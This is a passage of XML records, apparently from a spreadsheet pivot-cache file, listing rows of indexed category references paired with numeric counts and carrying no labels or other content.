  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="430"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="430"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="430"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="430"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="431"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="431"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="431"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="431"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="431"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="431"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="40"/>
    <x v="431"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="431"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="70"/>
    <x v="432"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="28"/>
    <x v="432"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="432"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="140"/>
    <x v="432"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="432"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="432"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="433"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="433"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="433"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="433"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="433"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="433"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="28"/>
    <x v="434"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="434"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="434"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="140"/>
    <x v="434"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="434"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="434"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="435"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="435"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="435"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="435"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="436"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="436"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="436"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="436"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="437"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="437"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="437"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="437"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="14"/>
    <x v="437"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="437"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="437"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="437"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="63"/>
    <x v="438"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="13"/>
    <x v="438"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="438"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="438"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="438"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="438"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="439"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="439"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="439"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="32"/>
    <x v="439"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="439"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="439"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="440"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="440"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="440"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="440"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="441"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="441"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="441"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="18"/>
    <x v="441"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="63"/>
    <x v="441"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="255"/>
    <x v="441"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="441"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="441"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="18"/>
    <x v="442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="23"/>
    <x v="442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="28"/>
    <x v="442"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="442"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="442"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="442"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="100"/>
    <x v="442"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="410"/>
    <x v="442"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="442"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="442"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="443"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="443"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="50"/>
    <x v="443"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="443"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="444"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="445"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="14"/>
    <x v="445"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="445"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="445"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="445"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="24"/>
    <x v="445"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="445"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="445"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="446"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="446"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="446"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="446"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="446"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="100"/>
    <x v="446"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="446"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="446"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="50"/>
    <x v="447"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="18"/>
    <x v="447"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="447"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="447"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="337"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="337"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="337"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="337"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="337"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="448"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="448"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="448"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="448"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="448"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="50"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="40"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="70"/>
    <x v="449"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="23"/>
    <x v="449"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="447"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="447"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="450"/>
  </r>
